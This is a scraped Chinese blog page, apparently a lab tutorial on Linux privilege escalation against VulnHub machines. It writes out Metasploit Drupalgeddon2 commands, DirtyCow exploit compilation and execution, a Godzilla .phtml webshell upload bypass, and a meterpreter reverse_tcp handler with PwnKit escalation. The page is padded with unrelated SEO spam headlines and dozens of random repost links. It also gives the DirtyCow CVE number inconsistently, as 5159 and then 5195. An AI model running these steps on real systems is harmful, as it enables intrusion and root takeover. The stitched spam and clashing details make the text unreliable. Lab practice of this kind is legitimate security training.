当前位置: 首页 > wzjs >正文

网站测速陕西政务服务网注册公司流程

网站测速,陕西政务服务网注册公司流程,怎么自己免费创建一个网站,wordpress给图片加链接案例一dirtycow(CVE-2016-5159) 有个前置知识就是 获取liunx的内核 hostnamectl uname -a 然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多 也是需要使用辅助工具在本地进行辅助检测 然后去nomi-sec/PoC-in-GitHub: &#…

案例一dirtycow(CVE-2016-5159)

有个前置知识就是  获取liunx的内核

hostnamectl

uname -a

然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多   也是需要使用辅助工具在本地进行辅助检测  然后去nomi-sec/PoC-in-GitHub: 📡 从 GitHub 自动收集 PoC。⚠️ 小心恶意软件。

去找寻exp或者使用   msf本地的  梭哈模块去寻找利用的漏洞

run post/multi/recon/local_exploit_suggester

辅助检测工具:

单一的内核漏洞检测:https://github.com/The-Z-Labs/linux-exploit-suggester

综合型的工具:

https://github.com/diego-treitos/linux-smart-enumeration
我们把.sh文件上传到/usr/share 下
然后我们扫描一下我们的靶机
https://www.vulnhub.com/entry/lampiao-1,249/
靶机下载地址
信息收集扫描ip扫描
访问80端口发现没有信息访问1898
看到这个外星人图标就知道是内网渗透中经常出现的Drupal
这个最常见的利用就是框架漏洞
发现是低版本的php搭建的 所以直接进行利用
这里我直接使用第二个exp
使用use进行调用
查看利用的配置  
检查一下payload
设置上  rhost和rport
 
报这个标头就是进入了 后渗透模式  就是我们已经控制了对方的主机
查看用户权限
找好定位我们现在是在web权限上
输入shell获取对方的命令行
查看id是1000内的所以我们的目标是拿取root权限
需要使用漏洞 先上传检测文件
报了小脏牛漏洞  直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
利用的exp
exp上传  
上传之后把exp.c进行编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'
复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、内核提权:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二  pwnkit  

靶机下载https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先扫描内网的ip

开放了80 

这个漏洞是前端的一个逻辑越权漏洞 先注册一个账号

账号修改里出现这个id可能就是 代表的账户 

我们试一下改为1会不会直接修改admin的账号和密码

哥斯拉生成后门 使用绕过形式 改为 .phtml 进行绕过

后门上传成功

后门地点

http://192.168.248.136/upload/xxx.phtml

学个新操做   哥斯拉联动msf(在不使用msfvemon生成反弹shell的情况下)

命令:

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加载再go

接受到了shell   然后进行提权

上传检测脚本

这个就是我们要学的新漏洞

第一个方法就是使用本地漏扫工具

run post/multi/recon/local_exploit_suggester
二就是  使用search 搜索cve编号看看exp库中有没有利用的
提权成功

文章转载自:

http://CLZXkwKN.yqpzL.cn
http://Y3RRxFez.yqpzL.cn
http://dexELrzl.yqpzL.cn
http://62lg03j7.yqpzL.cn
http://pC7EMm0q.yqpzL.cn
http://be4ID4fk.yqpzL.cn
http://GNRVOLzU.yqpzL.cn
http://JEbtYDyv.yqpzL.cn
http://TcYuPEyP.yqpzL.cn
http://1LbeenVC.yqpzL.cn
http://yT0MpO5F.yqpzL.cn
http://cSfEylnq.yqpzL.cn
http://gUTIfrLn.yqpzL.cn
http://LnZs797N.yqpzL.cn
http://72SmXLpu.yqpzL.cn
http://RnimgfPg.yqpzL.cn
http://g5VqOcVA.yqpzL.cn
http://CeBOmNwc.yqpzL.cn
http://Hr6b9bVy.yqpzL.cn
http://PHRH0fcT.yqpzL.cn
http://iW6fhZUl.yqpzL.cn
http://bVClD9Ym.yqpzL.cn
http://QBShOyV0.yqpzL.cn
http://UkB1Bpii.yqpzL.cn
http://lrzhnAOn.yqpzL.cn
http://3Gvx1tNk.yqpzL.cn
http://drB1hNjU.yqpzL.cn
http://RZA8bYZ2.yqpzL.cn
http://bQ3UsLTq.yqpzL.cn
http://NWlJavGF.yqpzL.cn
http://www.dtcms.com/wzjs/662432.html

相关文章:

  • 在excel表里做网站模板重庆好的推广网站
  • 推广网站的论坛大量图片展示网站模板
  • 微网站建设86215珠海高端网站制作公司
  • 网站没备案能百度推广吗网站建设报价清单
  • 河北中凯建设有限公司网站网站开发基本过程
  • 做网站容易还是app拿word如何做网站
  • 建一个优化网站多少钱商务网站设计制作
  • 低价网站建设费用预算做图书馆网站
  • wordpress拖拽插件昆明网站seo诊断
  • 做一的同志小说网站有哪些关键词推广名词解释
  • 在西安市建设工程交易中心网站上xp系统做局域网内网站
  • 百度地图 添加到网站亚马逊 网站建设
  • 中国建设注册管理中心网站asp网站授权码如何做
  • 单页网站上传教程织梦网站地图优化
  • 网站的第二域名怎么用我想承包小工程
  • 淘宝客手机网站怎么做网站建设昆山博敏
  • 做游戏数据分析的网站技术支持 合肥网站建设
  • 网站开发流程电话系统架构有哪几种
  • 怎么浏览英文网站网站下载音乐
  • 上海网站制作衫贵阳有哪些可以制作网站的公司
  • 财政网站平台建设不足wordpress选项卡
  • 什么样是权网站重高的建个微网站多少钱
  • 运城公司网站建设网站建设需要用到哪些技术
  • 南充做网站的公司软件公司网站设计
  • 中国建设信息港网站网站建设优化服务如何
  • a做爰视频免费观费网站河北衡水建设网站公司
  • wordpress建站要用模板吗吉林市网站建设优化
  • 最好的响应式网站有哪些石家庄 网站建设 15369356722
  • 潮州哪里做网站wordpress 批量换
  • html做静态网站苏州网站建设一条龙